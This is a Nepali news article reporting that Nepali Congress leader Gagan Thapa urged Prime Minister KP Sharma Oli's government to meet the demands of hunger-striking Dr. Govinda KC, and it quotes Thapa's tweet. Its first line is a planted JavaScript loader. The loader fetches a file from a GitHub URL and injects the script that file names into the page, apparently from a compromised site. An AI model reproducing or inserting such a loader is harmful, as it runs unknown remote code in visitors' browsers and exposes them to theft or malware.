;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज १९
काठमाडौं । नेपाली कांग्रेसका युवा नेता गगन कुमार थापाले २१ दिनदेखि अनसनरत डा.गोविन्द केसीको माग पूरा गर्न सरकारलाई आग्रह गरेका छन् । सोमबार सामाजिक संजाल टुविइट् गर्दै उनले स्वास्थ्य क्षत्रको सुधारको लागि केसीले राखेको माग जायज् भएको उल्लेख गर्दै तत्काल सम्वोधन गर्न सरकारलाई ध्यानाकर्षण गरेको हुन् ।
नेता थापाले डा. केसीले राखेको माग सबै जायज् भएको भनेका छन् । केसीका माग जनहित विपरीत नभएको उनको दाबी छ । नेता थापाले प्रधानमन्त्री केपी शर्मा ओली सरकारले आफैले विगतका दिनमा गरेका बाचा पूरा नगर्दा डा. केसी पुःन अन्सनमा बस्नु परेको स्मरण गरेका छन् । नेता थापाले पुरा गर्न सकिने र गर्नुपर्ने माग छन्,पूरा गर्नुहोस् ।
यसमा हाम्रो पूर्ण साथ र सहयोग रहनेछ। तर,एउटा सत्याग्रहीमाथि दुराग्रह राखेर बेवास्ता गर्नुभयो भने त्यसको ठुलो मूल्य तपाईँले चुकाउनु पर्ने छ । भन्दै चेतावनी पनि दिएका छन । साथै नेता थापाले प्रधानमन्त्री केपी शर्मा ओलीलाई डा.केसीको जीवन तल माथि भयो भने यसको शत प्रतिशत दोषी हुने पनि उल्लेख गरेका छन् ।
. @PM_Nepal ज्यू,डा.गोविन्द केसीले राख्नुभएको कुन चाहिँ माग पूरा नहुने/गर्न नसकिने छ? कुन माग जनहित विपरीत छन्?
तपाईँ आफैले हिजो गरेको बाचा पूरा नगर्दा नै यी विषय आज माग बनेका होइनन् र?
डा.केसीसंग संवाद नै गर्दिन भन्ने तपाईँको हठले के तपाईँको मान बढाउँछ?— Gagan Thapa (@thapagk) October 5, 2020
फेसबुक प्रतिक्रियाहरु